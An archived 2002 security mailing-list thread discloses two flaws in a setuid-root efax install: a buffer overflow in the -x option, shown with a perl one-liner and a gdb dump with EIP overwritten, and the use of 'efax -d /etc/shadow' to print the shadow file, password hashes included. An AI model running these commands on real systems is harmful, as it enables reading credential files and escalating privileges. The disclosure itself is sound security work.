Re: efax

From: Wodahs Latigid (wodahsat_private)
Date: Wed Jan 16 2002 - 01:03:23 PST
Next message: xperc: "Chinput Buffer Overflow Vulnerability"
Previous message: NetBSD Security Officer: "NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I found a buffer overflow in efax a while back,
reported it and didn't get a response. Here's
the original email:
-----------------------------------------------
To: edcat_private
Subject: Efax Buffer Overflow
You may or not be interested (as this has no
major impact on the outside world), but there
is a buffer overflow in the -x function of
efax. Obviously, efax should not be setuid
root, but I can imagine a situation with an
administrator doing so to give "trusted" users
access to the fax facility.
-----------------------------------------------

And here's more detail:

# cat /etc/mandrake-release
Linux Mandrake release 8.0 (Traktopel) for i586

Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
/usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
efax: 54:49 Error: can't open pre-lock file AAAA..[A's Cut]..AAAATMP..25717: File name too long
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) inf reg
.. stuff cut ..
edx            0x65656565       1701143909
ebx            0x41414141       1094795585
esp            0xbffefd58       0xbffefd58
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
.. stuff cut ..

Digital Shadow
http://www.ministryofpeace.co.uk/



-----Original Message-----
From: H D Moore <sflistat_private>
Date: Tue, 15 Jan 2002 18:44:57 -0600
To: VULN-DEVat_private
Subject: efax


> Didn't see this mentioned before...
> 
> hdm@sliver:~ > which efax
> /opt/kde2/bin/efax
> hdm@sliver:~ > ls -la /opt/kde2/bin/efax
> -rwsr-xr-x    1 root     root        96689 Aug 16 10:23 /opt/kde2/bin/efax
> hdm@sliver:~ > efax -h
> efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> efax: 43:28 compiled Aug 16 2001 10:23:23
> efax: 43:28 Error: no argument for (-h)
> Usage:
>   efax [ option ]... [ -t num [ file... ] ]
> Options:
>   -a str  use command ATstr to answer
>   -c cap  set modem and receive capabilites to cap
>   -d dev  use modem on device dev
>   -e cmd  exec "/bin/sh -c cmd" for voice calls
>   -f fnt  use (PBM) font file fnt for headers
>   -g cmd  exec "/bin/sh -c cmd" for data calls
>   -h hdr  use page header hdr (use %d's for current page/total pages)
>   -i str  send modem command ATstr at start
>   -j str  send modem command ATstr after set fax mode
>   -k str  send modem command ATstr when done
>   -l id   set local identification to id
>   -o opt  use protocol option opt:
>       0     use class 2.0 instead of class 2 modem commands
>       1     use class 1 modem commands
>       2     use class 2 modem commands
>       a     if first [data mode] answer attempt fails retry as fax
>       e     ignore errors in modem initialization commands
>       f     use virtual flow control
>       h     use hardware flow control
>       l     halve lock file polling interval
>       n     ignore page retransmission requests
>       r     do not reverse received bit order for Class 2 modems
>       x     use XON instead of DC2 to trigger reception
>       z     add 100 ms to pause before each modem comand (cumulative)
>   -q ne   ask for retransmission if more than ne errors per page
>   -r pat  save received pages into files pat.001, pat.002, ...
>   -s      share (unlock) modem device while waiting for call
>   -v lvl  print messages of type in string lvl (ewinchamr)
>   -w      don't answer phone, wait for OK or CONNECT instead
>   -x fil  use uucp-style lock file fil
> Commands:
>   -t      dial num and send fax image files file...
> efax: 43:28 done, returning 2 (unrecoverable error)
> hdm@sliver:~ > efax -d /etc/shadow
> efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> efax: 43:35 compiled Aug 16 2001 10:23:23
> efax: 43:35 opened /etc/shadow
> efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:35 Warning: unexpected response "root:sjSs9mscTsosA:11521:0:10000::::"
> efax: 43:35 Warning: unexpected response "bin:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "daemon:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "lp:*:9473:0:10000::::"
> efax: 43:35 Warning: unexpected response "news:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "uucp:*:0:0:10000::::"
> efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
> efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
> efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
> efax: 43:35 Warning: unexpected response "hdm:snBsN0stfzsMg:11564:0:99999:7:0::"
> efax: 43:35 Warning: unexpected response "oracle:!:11556:0:99999:3:0::"
> efax: 43:35 Warning: unexpected response "yaku:!:11636:0:99999:3:0::"
> efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:35 sync: dropping DTR
> efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:36 sync: sending escapes
> efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:37 Error: sync: modem not responding
> efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> efax: 43:37 done, returning 2 (unrecoverable error)
> 
> -- 
> H D Moore
> http://www.digitaldefense.net - work
> http://www.digitaloffense.net - play
> 
> 

-- 

_______________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup


1 cent a minute calls anywhere in the U.S.!

http://www.getpennytalk.com/cgi-bin/adforward.cgi?p_key=RG9853KJ&url=http://www.getpennytalk.com
Next message: xperc: "Chinput Buffer Overflow Vulnerability"
Previous message: NetBSD Security Officer: "NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 17:58:17 PST